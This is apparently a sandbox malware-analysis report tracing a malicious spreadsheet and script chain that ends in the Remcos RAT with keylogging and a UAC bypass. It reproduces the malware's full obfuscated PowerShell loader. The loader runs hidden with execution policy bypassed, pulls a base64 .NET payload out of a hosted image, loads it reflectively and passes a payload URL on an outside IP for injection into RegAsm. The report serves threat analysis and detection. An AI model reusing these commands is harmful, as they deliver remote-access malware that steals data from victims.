                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                    Start time:09:24:05
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                    Start time:09:24:06
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                                                                                                                                                                                                                    Imagebase:0x13fe80000
                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                                                                                                                                                                                                                    Imagebase:0xff910000
                                                                                                                                                                                                                    File size:168'960 bytes
                                                                                                                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                    Start time:09:24:13
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                    File size:64'704 bytes
                                                                                                                                                                                                                    MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Has exited:true


Module: Sheet1

Declaration
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet2

Declaration
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: Sheet3

Declaration
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000003.436584026.0000000002B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_3_2b30000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction ID: 4f36ca7eb5c8e0b643252b114b1545ac3f6212172aa1456c1bd5710681ec9a9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                      execution_graph 3846 7fe89957ae1 3847 7fe89957af1 URLDownloadToFileW 3846->3847 3849 7fe89957c00 3847->3849

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 101 7fe89957018-7fe89957ba1 105 7fe89957ba3-7fe89957ba8 101->105 106 7fe89957bab-7fe89957bb1 101->106 105->106 107 7fe89957bb3-7fe89957bb8 106->107 108 7fe89957bbb-7fe89957bfe URLDownloadToFileW 106->108 107->108 109 7fe89957c00 108->109 110 7fe89957c06-7fe89957c23 108->110 109->110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459211883.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89950000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DownloadFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1407266417-0
                                                                                                                                                                                                                      • Opcode ID: ad102f671b387c8bdb9eccb270edfe768abafc60277576bb303147bf56b224b4
                                                                                                                                                                                                                      • Instruction ID: 95bd0619ac69998a781a7aa69bc74f58fb9eba3f05624c16dcc8306718fa93a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad102f671b387c8bdb9eccb270edfe768abafc60277576bb303147bf56b224b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5319131918A5C9FDB58EF9CD8857A9B7E1FB59321F00822ED04DD3661CB70B9058B81

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 88E$XhL
                                                                                                                                                                                                                      • API String ID: 0-745517462
                                                                                                                                                                                                                      • Opcode ID: 94824be57cb7f488fdf6d7ac484959099b864282760d69c31e465bab8ac4870b
                                                                                                                                                                                                                      • Instruction ID: b6a511e6e5ecba9464be4dcd289b2df9d16111bc90985e4a21c15a60905a25df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94824be57cb7f488fdf6d7ac484959099b864282760d69c31e465bab8ac4870b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7881102190E7D60FE75393B858246A57FF1DF97650B0E01EBC489CB1B3D909AC0AC362

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: V
                                                                                                                                                                                                                      • API String ID: 0-1342839628
                                                                                                                                                                                                                      • Opcode ID: acead22ee7a58f46e2dad43e27571325ee0a1e98a0437a5df0c64e66761ec7f8
                                                                                                                                                                                                                      • Instruction ID: bb48dba18660a8a7534886b193e933e4d347b244f4c669b8f50cbb4490215f33
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acead22ee7a58f46e2dad43e27571325ee0a1e98a0437a5df0c64e66761ec7f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D1033080E7C91FD35797785C146AA7FA4EF47260F0911EBD48DCB0A3D619A95AC3A2

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459211883.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89950000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DownloadFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1407266417-0
                                                                                                                                                                                                                      • Opcode ID: 42e23f3c00eae9c535f4e8da4675f0b03c426fa5b78777b7137bb74090def025
                                                                                                                                                                                                                      • Instruction ID: a69c517d1d6a02b0e2b217f7f1ac54f2b5ef8ff93ab3c23d3cfaab9572b0517f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e23f3c00eae9c535f4e8da4675f0b03c426fa5b78777b7137bb74090def025
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE41F67090CB889FDB16DB989C447AABBF4FB56321F04826FD08DD3562CB646906C781

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 80e125d1f0bdd3838f4fd96568f2d256f7b8e1d678ae7cd5a5a2db0573f5d8e6
                                                                                                                                                                                                                      • Instruction ID: e6646b24ea0638f4fa829d39a4268bd06844e2bc46bef1f149a3d945c697aa66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e125d1f0bdd3838f4fd96568f2d256f7b8e1d678ae7cd5a5a2db0573f5d8e6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3332E43090CB894FD75ADB2C84546697FE2FF9A344F2900EED48EC72A3DA25AC56C741

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 964f9b0c25404bc383c9be2691439606b282803c68477780b2d2971253328d44
                                                                                                                                                                                                                      • Instruction ID: edb316308ccf7e6dac17cc153e9592d76020b293ad85854ade5d7031fff29f90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964f9b0c25404bc383c9be2691439606b282803c68477780b2d2971253328d44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9802E53090CB894FD79ADB2C84546697FE2FF9A344F2500EAD48EC72A3DA34AC56C741

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 233ffbde74005b5bb47b97cd57495abaf0cfea3b51354c09dcc2de09937b00d3
                                                                                                                                                                                                                      • Instruction ID: 745cf05793ccb98fd0d10045d35cba31bae36e0526c92052c3c1c20c6a1ebf1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 233ffbde74005b5bb47b97cd57495abaf0cfea3b51354c09dcc2de09937b00d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941D211B0DBCA0FE35B937C1854264BFE1EF5B255B1901EBC48EC72A3D9099C5AC3A1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6196658470c5b762067465cbbba928863655f93245d9a44515c9cfe0304f755e
                                                                                                                                                                                                                      • Instruction ID: b44b3cd62537f3f38dd9b70717cd570a3d64ac2a43305b674532abbe28f0bbfd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6196658470c5b762067465cbbba928863655f93245d9a44515c9cfe0304f755e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBA1582090EBC90FD747A7B89C142A67FF5EF4B254F1901EBD48DCB1A3D618991AC362

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:17
                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                      execution_graph 5443 7fe8992d9e5 5444 7fe8992da10 ResumeThread 5443->5444 5446 7fe8992da8b 5444->5446 5447 7fe8992d824 5448 7fe8992d82d WriteProcessMemory 5447->5448 5450 7fe8992d911 5448->5450 5451 7fe8992b916 5452 7fe8992b91d 5451->5452 5455 7fe899261e8 5452->5455 5456 7fe8992d560 Wow64SetThreadContext 5455->5456 5458 7fe8992b224 5456->5458 5459 7fe8992b75a 5463 7fe899261c8 5459->5463 5461 7fe8992b697 5461->5459 5462 7fe8992b7b2 5461->5462 5464 7fe8992d220 CreateProcessW 5463->5464 5466 7fe8992d413 5464->5466 5466->5461

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (b]$XhL$XhL
                                                                                                                                                                                                                      • API String ID: 0-479436562
                                                                                                                                                                                                                      • Opcode ID: a770cdac8131c1788920a26c010cf70bb0cf838fde613b046835ffe3ba3cf18a
                                                                                                                                                                                                                      • Instruction ID: fe4b5eba6c2981d0d6b7fb4adc37d9da321053bace058d9a7f3e6514450b5221
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a770cdac8131c1788920a26c010cf70bb0cf838fde613b046835ffe3ba3cf18a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B72E120A0DBCA0FE757A73858642B5BFE1EF57254B1901EBD08EC71B3DA18AC59C391

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 154 7fe8992d14d-7fe8992d1d0 155 7fe8992d1ef-7fe8992d2bd 154->155 156 7fe8992d1d2-7fe8992d1e1 154->156 161 7fe8992d2cf-7fe8992d2d4 155->161 162 7fe8992d2bf-7fe8992d2cc 155->162 157 7fe8992d1e3-7fe8992d1eb 156->157 158 7fe8992d1ec-7fe8992d1ed 156->158 157->158 158->155 163 7fe8992d2f2-7fe8992d31d 161->163 164 7fe8992d2d6-7fe8992d2e6 161->164 162->161 165 7fe8992d31f-7fe8992d333 163->165 166 7fe8992d2e8-7fe8992d2f0 163->166 164->163 167 7fe8992d336-7fe8992d411 CreateProcessW 165->167 166->167 169 7fe8992d413 167->169 170 7fe8992d419-7fe8992d4a5 call 7fe8992d4a6 167->170 169->170
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 05d551366256a02dc161c28c257340c25309e5e1c96192cf53f05a91a44de061
                                                                                                                                                                                                                      • Instruction ID: 0bb3765844e35ca11f32ed75bd400ec5f16b625ddfc8bf00292663cb42a82501
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05d551366256a02dc161c28c257340c25309e5e1c96192cf53f05a91a44de061
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31C1C47180CB988FDB56DF68D855AD97BF0FF5A310F0542DBD049D72A2CA30A985CB82

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 177 7fe899261c8-7fe8992d2bd 180 7fe8992d2cf-7fe8992d2d4 177->180 181 7fe8992d2bf-7fe8992d2cc 177->181 182 7fe8992d2f2-7fe8992d31d 180->182 183 7fe8992d2d6-7fe8992d2e6 180->183 181->180 184 7fe8992d31f-7fe8992d333 182->184 185 7fe8992d2e8-7fe8992d2f0 182->185 183->182 186 7fe8992d336-7fe8992d411 CreateProcessW 184->186 185->186 188 7fe8992d413 186->188 189 7fe8992d419-7fe8992d4a5 call 7fe8992d4a6 186->189 188->189
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                                                      • Opcode ID: 04ac3cb51e9d9144d08b058d29617793c53aa0dd04071985bb8df0a5c349137d
                                                                                                                                                                                                                      • Instruction ID: 328f7cd1bb861aaadb5944682dea4ac3c66437f97b108439a0c7fd311e9ceba8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04ac3cb51e9d9144d08b058d29617793c53aa0dd04071985bb8df0a5c349137d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87915B30918A5C8FDB69EF58D845BEDBBF1FB58710F10429AD04EE3261CB70A9858B81

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 196 7fe8992d824-7fe8992d82b 197 7fe8992d836-7fe8992d8c0 196->197 198 7fe8992d82d-7fe8992d835 196->198 201 7fe8992d8c2-7fe8992d8c7 197->201 202 7fe8992d8ca-7fe8992d90f WriteProcessMemory 197->202 198->197 201->202 203 7fe8992d911 202->203 204 7fe8992d917-7fe8992d941 202->204 203->204
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
